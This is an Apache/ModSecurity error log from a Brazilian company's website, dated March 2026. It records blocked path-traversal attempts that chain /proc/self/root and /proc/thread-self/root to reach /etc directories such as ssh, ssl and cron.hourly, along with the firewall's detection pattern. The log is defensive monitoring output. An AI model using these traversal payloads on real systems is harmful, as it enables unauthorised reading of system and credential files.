[Thu Mar 19 06:56:13.163427 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:45522] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIPOyqAr6etmhZHNpEpAAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:56:13.363622 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:45522] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIPeyqAr6etmhZHNpEpQAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:56:16.058634 2026] [:error] [pid 27403:tid 140411641214720] [client 74.7.243.128:45526] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIQBkFeYa1D6dYQnDQtwAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:56:17.063044 2026] [:error] [pid 27403:tid 140411582465792] [client 74.7.228.61:60320] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvIQRkFeYa1D6dYQnDQuAAAAdM"]
[Thu Mar 19 06:56:18.127937 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:45538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIQta6ubjKNq_cu4YpNgAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:56:23.651613 2026] [:error] [pid 27403:tid 140411632822016] [client 74.7.243.128:59114] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIRxkFeYa1D6dYQnDQwAAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:56:27.825413 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.243.128:59118] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIS8df6f5d65gmYZRVZwAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:56:38.133875 2026] [proxy_fcgi:error] [pid 26799:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:43234] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:56:39.771717 2026] [:error] [pid 27293:tid 140411565680384] [client 74.7.243.128:44946] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIVf-YZRR_7pZ7nDJu2AAAA9U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:56:41.361390 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:40708] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIWcdf6f5d65gmYZRVawAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:56:44.967791 2026] [:error] [pid 27293:tid 140411607643904] [client 74.7.243.128:40716] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIXP-YZRR_7pZ7nDJu4AAAA9A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:56:48.918308 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.243.128:40720] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIYOyqAr6etmhZHNpEsgAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:56:58.283732 2026] [core:alert] [pid 15826:tid 140411590858496] [client 57.141.18.59:46752] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 06:57:02.129775 2026] [proxy_fcgi:error] [pid 19093:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:43912] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:57:03.250484 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:43522] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIbwkwaGbbGflqUZCbagAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:57:07.714944 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:36420] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIc9a6ubjKNq_cu4YpZAAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:57:08.735026 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:36420] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIdNa6ubjKNq_cu4YpaAAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:57:14.087379 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:46720] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIeta6ubjKNq_cu4YpdAAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:57:18.619390 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:46736] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIfuyqAr6etmhZHNpEvwAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:57:24.355444 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.243.128:52334] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIhMdf6f5d65gmYZRVhgAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:57:26.523893 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:52346] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIhuoXxyEfFpUF8f_xCAAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:57:27.137864 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:44656] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:57:28.769074 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:52358] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIiOyqAr6etmhZHNpExQAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:57:31.105248 2026] [mime_magic:error] [pid 17653:tid 140411590858496] (70014)End of file found: [client 57.141.18.42:47606] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 06:57:31.815641 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:42136] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIi8df6f5d65gmYZRViwAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 06:57:35.295718 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:42140] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvIjwkwaGbbGflqUZCbiQAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
